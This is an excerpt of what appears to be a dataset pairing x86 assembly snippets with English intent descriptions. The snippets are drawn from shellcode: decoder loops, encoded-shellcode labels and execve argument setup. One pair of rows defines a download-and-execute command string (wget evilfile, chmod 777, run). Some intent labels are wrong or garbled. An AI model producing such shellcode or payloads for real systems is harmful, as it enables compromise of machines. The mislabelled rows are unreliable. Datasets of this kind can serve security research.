SNIPPETS
stringlengths
2
1.64k
INTENTS
stringlengths
4
1.66k
lea ecx, [eax]
load the effective address of the result of the operation [eax] into the ecx register
lea ecx, [ebp+28]
load the effective address [ebp+28] into ecx
lea ecx, [ebp+28]
load the effective address of the result of the operation [ebp+28] into the ecx register
lea ecx, [ebx+0xff]
load the value of ebx+0xff into register ecx
lea ecx, [ebx+8]
load the effective address of ebx+8 into ecx
lea ecx, [esi + 8]
load the adress esi+8 into ecx register
lea ecx, [esi + 8]
load the effective address of the result of the operation [esi + 8] into the ecx register
lea ecx, [esi]
point ecx to the start of the shellcode
lea ecx, [esi+1]
point ecx to the next byte of the shellcode
lea ecx, [esi+18]
load the effective address [esi+18] into ecx
lea ecx, [esi+18]
load the effective address of the result of the operation [esi+18] into the ecx register
lea ecx, [esi+22]
load the effective address of the result of the operation [esi+22] into the ecx register
lea ecx, [esi+35]
load address of ptr to argv[] array into ecx register
lea ecx, [esi+35]
load the effective address of the result of the operation [esi+35] into the ecx register
lea ecx, [esi+8]
load the effective address of the result of the operation [esi+8] into the ecx register
lea ecx, [esp]
load stack pointer to ebx
lea ecx, [esp]
load esp address into ecx register
lea ecx, [esp]
load the effective address of esp into the ecx register
lea ecx, [zero_reg+117]
load the effective address [zero_reg+117] into ecx
lea ecx, [zero_reg+117]
load the effective address of the result of the operation [zero_reg+117] into the ecx register
lea ecx, [zero_reg+3]
load the effective address [zero_reg+3] into ecx
lea ecx, [zero_reg+3]
load the effective address of the result of the operation [zero_reg+3] into the ecx register
lea ecx,[esi+0xc]
load the address esi+0xc into ecx register
lea edi, [ebx]
load the effective address [ebx] into edi
lea edi, [ebx]
load the effective address of ebx into the edi register
lea edi, [ebx+4*esi]
place the value ebx+4*esi in edi
lea edi, [ebx+4*esi]
place the quantity ebx+4*esi in edi
lea edi, [edi + 2]
load the address of edi+2 into edi
lea edi, [edi +8]
make edi point to rot_value
lea edi, [esi + 13]
put the byte in the address esi+13 in edi regsiter.
lea edi, [esi + 13]
load the effective address of the result of the operation [esi + 13] into the edi register
lea edi, [esi + 13]
load the address at esi + 13 into edi
lea edi, [esi +1]
transfer the second character pointed from esi to edi
lea edi, [esi +1]
load the effective address of [esi + 1] into the edi register
lea edi, [esi]
copy the address of esi in edi
lea edi, [esi]
load the effective address [esi] into edi
lea edi, [esi]
load the address of esi into edi
lea edi, [esi]
point edi to the start of the shellcode
lea edi, [esi]
load the contents of esi into edi
lea edi, [esi+0x1]
load the address of esi+0x1 into edi
lea edi, [esi+1]
point edi to the next byte of the shellcode
lea edi, [esi+13]
load the effective address of esi+13 into esi+13
lea edi,[esi]
copy the address of esi into edi register
lea edi,[esi+0x1]
copy the adress a tesi+0x1 into edi register
lea edx, [ebx+12]
load the effective address of ebx+12 into edx
lea edx, [esi + 12]
load the adress esi+12 into edx register
lea edx, [esi + 12]
load the effective address of the result of the operation [esi + 12] into the edx register
lea edx, [esi]
point edx to the start of the shellcode
lea edx, [esi+1]
point edx to the next byte of the shellcode
lea edx, [esi+26]
load the effective address [esi+26] into edx
lea edx, [esi+26]
load the effective address of the result of the operation [esi+26] into the edx register
lea edx, [esi+30]
load the effective address of the result of the operation [esi+30] into the edx register
lea edx, [esi+47]
load address of ptr to envp[] null into edx register
lea edx, [esi+47]
load the effective address of the result of the operation [esi+47] into the edx register
lea edx,[esi+0x10]
load the address esi+0x10 into edx register
lea esi, [ebp+20]
load the effective address [ebp+20] into esi
lea esi, [ebp+20]
load the effective address of the result of the operation [ebp+20] into the esi register
lea esi, [edi + 8]
transfer the eighth character pointed by edi to esi
lea esi, [edi +16]
make esi register point to shellcode
lea esi, [edi +8]
make esi point to shellcode that contains previous xorÕed results
lea esi, [esi +4]
load the effective address of the result of the operation [esi +4] into the esi register
lea esi, [esi+2]
load the effective address of esi+2 into esi
lea esi, [esi+4]
load the effective address [esi+4] into esi
lea esp, [ebx]
load the value of register ebx into register esp
lea rdi, [rsp]
load the address of the string that is on the stack into rsi
len equ $ - msg
define len equal to the length of msg
len equ $-encodedshellcode
define len equal to the lenght of the encodedshellcode array
len: equ $-encodedshellcode
variable for the lenght of the encoded shellcode
len: equ $-google
define len = size of db "127.1.1.1 google.com"
len: equ $-google
declare the len label equal to the size of the google variable
len: equ $-shellcode
define lenght of shellcode, len
len: equ $-shellcode
declare the len label equal to the length of shellcode
les esp,fword ptr [ebx]
loads 32-bit pointer from ebx to esp and fs regster
letter_c db 'c'
allocate a single byte of memory and initialize it to the letter 'c'
line db '/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile', 0x0a
define line as the byte string '/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile', 0x0a
line db "/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile", 0x0a
jump to the _exec label after entering the address of the string ""/usr/bin/wget http://127.0.0.1:8080/evilfile && /bin/chmod 777 evilfile && ./evilfile", 0x0a" at the top of the stack
loader:
define _loader
loader:
declare the loader label
lods al,byte ptr ds:[esi]
transfers string element addressed by esi regoster into al register
loop .3
decrement the counter and jump to .3 label if the count is not zero
loop 3
decrement ecx and jumps to the 3 label unless decrementing ecx caused its value to become zero
loop bucle
decrement the ecx register and jump to the bucle label if the counter is not zero
loop check_even_odd
loop check_even_odd using ecx for counter
loop check_even_odd
decrement the count register and jump to check_even_odd if the count is not equal to zero
loop check_even_odd \n jmp short shellcode
decrease the counter and jump to check_even_odd if not zero else jump short to shellcode
loop check_even_odd \n jmp short shellcode
decrement the ecx register and jump to the check_even_odd label if the contents of the ecx register is not zero else jump short to the shellcode label
loop decode
loop decode
loop decode
start loop decode
loop decode
loop deocde
loop decode
loop while zero flag not set
loop decode
decode current byte
loop decode
decrement ecx and jumps to the decode label unless decrementing ecx caused its value to become zero
loop decode
decrement the count register and jump to decode if not equal zero
loop decode
decrease the counter and jump to decode if not zero
loop decode \n jmp edx
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the edx register
loop decode \n jmp edx
decrement the counter and jump to decode if not zero else jump to edx
loop decode \n jmp EncodedShellcode
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the EncodedShellcode label
loop decode \n jmp encodedshellcode
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the encodedshellcode label
loop decode \n jmp Shellcode
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump to the Shellcode label
loop decode \n jmp shellcode
decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the shellcode label